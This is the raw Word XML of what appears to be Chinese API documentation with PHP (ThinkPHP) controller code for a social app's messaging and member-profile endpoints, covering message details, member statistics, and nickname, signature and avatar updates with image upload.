          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息发送者姓名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53893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sender_img          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息发送者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5328DE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sender_follow_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息发送者关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F09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Integer} sender_article_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息发送者发表文章数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66930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当前用户是否关注该消息发送者：</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31F2D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reate_time </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息发送时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B995C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update_time </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息阅读时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556C0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2B9216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1E6957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44ED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516174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BB8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E328D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ecipient_id'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447BB6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90331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A82E7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3B08B2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7B23A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856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DB45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_id = input('param.message_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3210F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_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F27B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d'] = $message_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B8E1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9DB6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775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消息</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724DE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94D0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1F0C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 = Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CE6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525DFE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B0340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ssage)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C1F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read'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B40D9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ssage')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EC30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7D1B9F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27B44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ad' =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FC8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3D3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C2B1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username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B26B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img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263C04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follow_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6789CF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article_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE970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follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12884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nder = _user($message['sender_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1156D5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sender)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B44A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username'] = $sender['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C7B7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img'] = $sender['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC8C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follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14872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message['sender_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F160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A9EC3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sender_article_num'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CB3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message['sender_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395458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73E2AB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ssage['sender_article_num'] += Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D80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message['sender_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5003C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CD4E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AA4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4DCC5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follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5483AC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message['sender_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A73F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2E3E4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6422C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B47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type_name'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4A7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type_id']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C893F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type_name'] = Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7858F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essage['type_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08663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value('title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F41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F9F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coin_name'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7096C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ssage['coin_id']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6368B9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 = Db::name('coin')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B37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essage['coin_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5840FF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0A5D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coin)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BE1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ssage['coin_name'] = $coin['currency'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8B7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38F1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985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message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC1F5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DE53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E53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消息不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113E1B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B8FB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9B82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EDF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5800C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C595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49757C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controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3A38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439C19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Query;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567F1A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6539F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7CEAF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5C3B16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 as Auth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DE7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2FA94C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set_time_limit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDEFE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ember extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C71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DC61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2318C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0969FD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35B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20FAE0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8740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param Request $request Request</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C8E0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52A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ccess public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7416F5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C37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7874D7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7A9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3AD360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5A29F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160DB4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26CEC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657FC4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71A6B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24D9FF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5A36BA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00A0A3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2DAFEF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518E9A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66B80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D6833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618CAE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6D041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3FBE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6E13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AFED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5CBCA3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4BE847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290EEC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8969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7EAAC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79B495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EA5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BBE4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232F1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7755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5BA1B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66F06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0B083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7E9F5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40D49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E1EC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473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AA738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1FB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7F02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230A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2F78C7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47818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38D0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33B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63EE76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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E473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CD48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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确，请重新获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Token',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213CF9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3B49A2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EC93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F66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F333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B1C7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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D03C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15340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258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D408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474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73AF9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18C6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ajaxError());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587D1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1F8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ACB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info </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取会员信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBFC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会员信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763EE8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666C8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D98AC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152EA4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t        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户公开信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396A1A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id      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367CA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nickname </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682C7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mobile   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户手机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE49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email    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户邮箱</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B594E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img      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2AA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sername </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8A00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qianming </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户签名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5837A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Array} guanzhu   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户关注列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A428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ensi   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户粉丝数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EE3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ongtai </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户动态数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB19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angke  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户访客数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B1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huozan  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户获赞数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B256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article_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布文章数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3404E5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circle_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加入圈子数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AECF0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create_time </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户创建时间（时间戳格式）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECB7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update_time </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最后登录时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE767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失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B721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48B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1ABCA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829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42C77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8F4BF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7063CE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3FF1CF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AAE2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C57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this-&gt;memberId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA71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mber['dongtai'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5871B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circle_id', 'null')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1A7F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79AAD0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91C5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fensi'] = Db::name('member_guanzhu')-&gt;where(['gz_uid' =&gt; $member['id']])-&gt;count('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407052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fangke'] = Db::name('member_fangke')-&gt;where(['f_uid' =&gt; $member['id']])-&gt;field('f_uid')-&gt;whereTime('time', 'week')-&gt;count('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30226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huozan'] = Db::name('article_ping_zan')-&gt;where(['uid' =&gt; $member['id']])-&gt;count('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331033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uanzhu = Db::name('member_guanzhu')-&gt;where(['uid' =&gt; $member['id']])-&gt;field('gz_uid')-&gt;limit(6)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8AC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guanzhu as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590A5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gz_uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D72D0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user)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6E5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uanzhu[$k]['username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416AB6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uanzhu[$k]['img'] = $user['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D9BC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uanzhu[$k]['uid'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D212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526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7EE2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guanzhu'] = $guanzhu;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB386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password'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683FDF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article_num'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757775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02F2A9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2656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circle_num'] = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D0B4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member_id', $this-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAB3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follow', 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A25D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3DD9FA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member]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E753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EB1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FA1E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nickname </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改会员昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295DC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修改会员昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCC0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0AB4C3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3C0E6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A5D6A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nickname </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户昵称（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC16A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修改成功信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0316B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修改失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197E18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81E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nickname()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3299E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1A22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3A7D7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911F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616239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103E6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3866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C014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 input('param.nickname', '', 'strip_tags');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE85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F343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nickname|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>昵称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require|max:30',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E8A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4B15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0F976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nickname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA7A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865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4625F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E79A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1C2C63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DEB6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FFDE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0F31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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE99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his-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468FB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131C9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nickname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4AD0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1C55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29FE1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4EB0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1684D6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275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E51C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AB83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修改失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D40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A324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0E20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07E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C015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1022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qianming </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改会员签名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F9E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修改会员签名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A12A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18F1E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2955F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78B2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qianming </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户签名（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F9A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修改成功信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060305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修改失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF663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5EA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qianming()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712D7C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1DE1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A6919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CF2CD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09B08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421A0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264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38E2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 = input('param.qianming', '', 'strip_tags');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A48EA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6A6A64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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>签名</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB109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E2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2931D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 =&gt; $qianming,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E83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8349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42A60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CBE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41465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1CC4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A20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2FE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDFA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his-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072852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30E29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 =&gt; $qianming,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F561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BB5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0EE02C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91518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4947BA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D83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A170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5CF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修改失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4885B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D60DE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385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F51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AF2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1A5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avatar </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改会员头像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC26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修改会员头像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B79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076BD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EE36C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5C090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image    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户头像（七牛图片文件名，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eg. 042e820210812091212723761.jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47638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修改成功信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505A1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修改失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7FC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654C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vatar()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292F9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30E2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86F2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C71E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6874DD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670F6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BCC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3C9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input('param.image', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CF8D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0664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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF1CA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FB3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6146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gt; $image,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A325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D602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451FF4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5E5BB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validate-&gt;getError(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0962A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289C4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07B8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37F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C092F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his-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276C50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update([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015BB5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gt; $image,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B2F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43B9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3826FC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AB0D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7E17D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AA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57F29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A54D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修改失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733DAC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0097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CFC5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D60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D28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ouxiang()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425D5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B01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quest()-&gt;isPost()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEF69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1AA1C6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4B389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54F75C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0973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333883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A2A6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0B04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B9C5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36EBCE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 = ['jpg', 'png', 'gif', 'jpeg', 'JPEG', 'JPG', 'GIF', 'PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F58F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_array($ext, $geshi)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F6C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E2DA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07D0A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AA2C4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4DA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A1F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substr(md5($file-&gt;getRealPath()), 0, 5) . date('YmdHis') . rand(100, 999999) . '.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF252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17535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74251F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4F3F6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DACD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7B307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0C58A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3F5D5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7B309B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12DCBB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392477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err !== null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FFE8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27838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err,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3919F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gt; 202,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34598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EEE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1088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update(['img' =&gt; $ret['key']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7DC2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domain . '/' . $ret['key'], 'code' =&gt; 0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29907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B36A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1AC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22C33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24B4A6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file-&gt;validate(['size' =&gt; 105678, 'ext' =&gt; 'jpg,png,gif,jpeg'])-&gt;move(ROOT_PATH . 'public' . DS . 'uploads' . DS . 'touimg');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4175DB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fo) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617FDB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public/uploads/touimg/' . $info-&gt;getSaveName();</w:t>
      </w:r>
    </w:p>
